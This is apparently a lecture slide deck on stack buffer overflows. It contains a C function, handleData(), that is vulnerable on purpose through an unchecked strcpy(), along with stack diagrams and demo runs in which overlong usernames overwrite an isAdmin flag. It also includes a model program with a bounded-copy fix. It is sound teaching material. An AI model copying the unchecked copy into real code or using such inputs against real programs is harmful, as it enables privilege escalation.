0x41 BufferOverflow

This document discusses stack buffer overflows. It explains the memory layout of functions, how C arrays work, and how buffer overflows can be exploited locally or remotely. It provides an example of a vulnerable function called handleData() that contains a buffer and integer variable. By passing a long string as input, an attacker can overwrite the integer's value and gain administrative privileges. The document also shows how buffer overflows work by overwriting memory addresses one by one until the return address is modified.

Uploaded by Ahmed
Copyright: © All Rights Reserved

Stack Buffer Overflow

1
Content

Intel Architecture          Buffer Overflow
Memory Layout               BoF Exploit
C Arrays                    Remote Exploit
Assembler                   Exploit Mitigations
Shellcode                   Defeat Exploit Mitigations
Function Calls
Debugging


2
Buffer Overflow
Without exploit

3
Buffalo Overflow

4
Buffer Overflow

▪ Challenge9
# ./challenge9 <username> <password>

# ./challenge9 someusername somepassword
You are not admin.
isAdmin: 0x0

5
Buffer Overflow

#include <stdio.h>
#include <string.h>

int checkPassword(char *password);

void handleData(char *username, char *password) {
    int isAdmin = 0;
    char firstname[16];

    isAdmin = checkPassword(password);
    strcpy(firstname, username);   /* no length check: username longer than 15 bytes overflows firstname */

    if (isAdmin > 0) {
        printf("Hello %s.\nYou are admin!\n", firstname);
        printf("isAdmin: 0x%x\n", isAdmin);
    } else {
        printf("Hello %s.\nYou are not admin.\n", firstname);
        printf("isAdmin: 0x%x\n", isAdmin);
    }
}
6
Buffer Overflow

#include <string.h>
#include <crypt.h>   /* crypt(); link with -lcrypt */

const char *adminHash = "$6$saaaaalty$cjw9qyA..";   /* hash is truncated on the slide */

int checkPassword(char *password) {
    char *hash;

    /* SHA-512 crypt ($6$) with the same salt that adminHash was generated with */
    hash = crypt(password, "$6$saaaaalty");

    if (hash != NULL && strcmp(hash, adminHash) == 0) {
        return 1;
    } else {
        return 0;
    }
}
7
Buffer Overflow
Stack frame of <handleData>, higher addresses at the top:

    +-------------------+
    | &password         |  arguments
    | &username         |
    +-------------------+
    | SIP               |  saved instruction pointer (return address)
    | SFP               |  saved frame pointer
    +-------------------+
    | isAdmin           |  local variables
    | firstname[16]     |
    +-------------------+
      push / pop move the stack pointer below the frame; the stack grows toward lower addresses

8
Buffer Overflow - Basic Layout

char firstname[16]        isAdmin

strcpy(firstname, "AAAA AAAA AAAA AAAA");   /* spaces only mark 4-byte groups: 16 bytes of 'A' */

AAAA AAAA AAAA AAAA       0

strcpy writes upward, from firstname toward isAdmin; the terminating NUL byte lands in the low byte of isAdmin, which is already 0

9
Buffer Overflow - Basic Layout

char firstname[16]        isAdmin

strcpy(firstname, "AAAA AAAA AAAA AAAA B");   /* 17th byte 'B' lands in isAdmin */

AAAA AAAA AAAA AAAA       B

strcpy writes upward, from firstname toward isAdmin

10
Buffer Overflow: handleData()

#include <stdio.h>
#include <string.h>

int checkPassword(char *password);

void handleData(char *username, char *password) {
    int isAdmin = 0;
    char firstname[16];
    /* (0) locals allocated, firstname still uninitialised */
    isAdmin = checkPassword(password);
    /* (1) isAdmin holds the result of the password check */
    strcpy(firstname, username);
    /* (2) username copied without a length check */
    if (isAdmin > 0) {
        printf("isAdmin: 0x%x\n", isAdmin);
    } else {
        printf("isAdmin: 0x%x\n", isAdmin);
    }
}

11
Buffer Overflow

char firstname[16] isAdmin

12
Buffer Overflow

step   char firstname[16]          isAdmin
(0)    <undefined>                 <undef>

13
Buffer Overflow

step   char firstname[16]          isAdmin
(0)    <undefined>                 <undef>
(1)    <undefined>                 0x00000000

14
Buffer Overflow

step   char firstname[16]          isAdmin
(0)    <undefined>                 <undef>
(1)    <undefined>                 0x00000000
(2)    AAAAAAAAAAAAAAAAAAAAA       0x00000000

15
Buffer Overflow

step   char firstname[16]          isAdmin
(0)    <undefined>                 <undef>
(1)    <undefined>                 0x00000000
(2)    AAAAAAAAAAAAAAAAAAAAA       0x00000000   (expected if strcpy respected the buffer)
(2)    AAAAAAAAAAAAAAAAAAAAA       0x00000041   (actual: the overflow byte 'A' = 0x41 lands in isAdmin)
16
Buffer Overflow

step   char firstname[16]          isAdmin, byte by byte (little-endian, lowest address first)
(2)    AAAAAAAAAAAAAAA             0x00 0x00 0x00 0x00

17
Buffer Overflow

step   char firstname[16]          isAdmin, byte by byte (little-endian, lowest address first)
(2)    AAAAAAAAAAAAAAA             0x00 0x00 0x00 0x00
(2)    AAAAAAAAAAAAAAA             A    0    0    0      (one 'A' written past the buffer)

18
Buffer Overflow

step   char firstname[16]          isAdmin, byte by byte (little-endian, lowest address first)
(2)    AAAAAAAAAAAAAAA             0x00 0x00 0x00 0x00
(2)    AAAAAAAAAAAAAAA             A    0    0    0      (one 'A' written past the buffer)
(2)    AAAAAAAAAAAAAAA             0x41 0x00 0x00 0x00   (isAdmin read as the integer 0x00000041)

19
Buffer Overflow

./challenge9 compass superpassword
You are not admin.

./challenge9 0123456789012345679012345678 test
You are not admin.

./challenge9 0123456789012345679012345678A test
You ARE admin!
isAdmin: 0x41

./challenge9 0123456789012345679012345678AB test
You ARE admin!
isAdmin: 0x4241

20
Buffer Overflow
Recap:
▪ Local variables of a function (buffers) are allocated adjacent to each other
▪ One after another, as written in the source code (first initialized, first allocated)
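The byte tables on the preceding slides and this recap are modelled below in a small C program. It is an added illustration, not code from the deck or from challenge9: it lays the two locals out in a plain byte array (16 bytes of firstname immediately followed by a 4-byte isAdmin, no compiler padding) so the effect of an unchecked strcpy() can be observed deterministically, and puts the bounded copy that would close the hole next to it. The function names unchecked_copy_isadmin and copy_firstname are assumptions made for this example.

```c
#include <inttypes.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Model of handleData()'s locals: firstname[16] directly followed by isAdmin.
 * This is an added illustration; on the real stack the compiler may insert
 * padding between the two, which is why challenge9 needs 28 bytes before
 * the first overflow byte reaches isAdmin. */
enum { NAME_LEN = 16, FRAME_LEN = NAME_LEN + sizeof(uint32_t) };

/* Emulates strcpy(firstname, username) with no length check and returns the
 * value isAdmin ends up holding, read little-endian as on x86.
 * The model clips the copy at the end of the frame so that the program itself
 * never writes out of bounds. */
uint32_t unchecked_copy_isadmin(const char *username)
{
    unsigned char frame[FRAME_LEN];
    memset(frame, 0, sizeof frame);        /* step (1): isAdmin = 0 from checkPassword() */

    size_t n = strlen(username) + 1;       /* strcpy() copies the terminating NUL as well */
    if (n > FRAME_LEN)
        n = FRAME_LEN;
    memcpy(frame, username, n);            /* step (2): bytes 16..19 spill into isAdmin */

    uint32_t isadmin = 0;
    for (int i = 3; i >= 0; i--)           /* assemble the int from its little-endian bytes */
        isadmin = (isadmin << 8) | frame[NAME_LEN + i];
    return isadmin;
}

/* Bounded replacement for the strcpy() in handleData(): refuses a name that
 * does not fit (including its NUL) instead of writing past the buffer.
 * Returns 0 on success, -1 when the input is rejected; dst is untouched then. */
int copy_firstname(char dst[NAME_LEN], const char *username)
{
    size_t len = strlen(username);
    if (len >= (size_t)NAME_LEN)
        return -1;                         /* reject rather than silently truncate */
    memcpy(dst, username, len + 1);        /* len + 1 keeps the NUL terminator */
    return 0;
}

int main(void)
{
    /* constructed inputs: exactly 16 'A's, then one and two extra bytes */
    const char *inputs[] = {
        "AAAA" "AAAA" "AAAA" "AAAA",
        "AAAA" "AAAA" "AAAA" "AAAA" "A",
        "AAAA" "AAAA" "AAAA" "AAAA" "AB",
    };
    char name[NAME_LEN];

    for (size_t i = 0; i < sizeof inputs / sizeof inputs[0]; i++) {
        printf("%-20s unchecked isAdmin=0x%" PRIx32 "   bounded copy: %s\n",
               inputs[i],
               unchecked_copy_isadmin(inputs[i]),
               copy_firstname(name, inputs[i]) == 0 ? "ok" : "rejected");
    }
    return 0;
}
```

Running the program prints 0x0, 0x41 and 0x4241 for the three inputs, matching the 0x41 / 0x4241 seen on the challenge9 slide, while the bounded copy rejects every name of 16 bytes or more. The check in copy_firstname() is the only change needed in handleData() to stop isAdmin from being reachable through username.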

21
Buffer Overflow

22
References

▪ https://www.uperesia.com/buffer-overflow-explained
▪ https://www.youtube.com/watch?v=1S0aBV-Waeo (Buffer Overflow Attack - Computerphile)

23
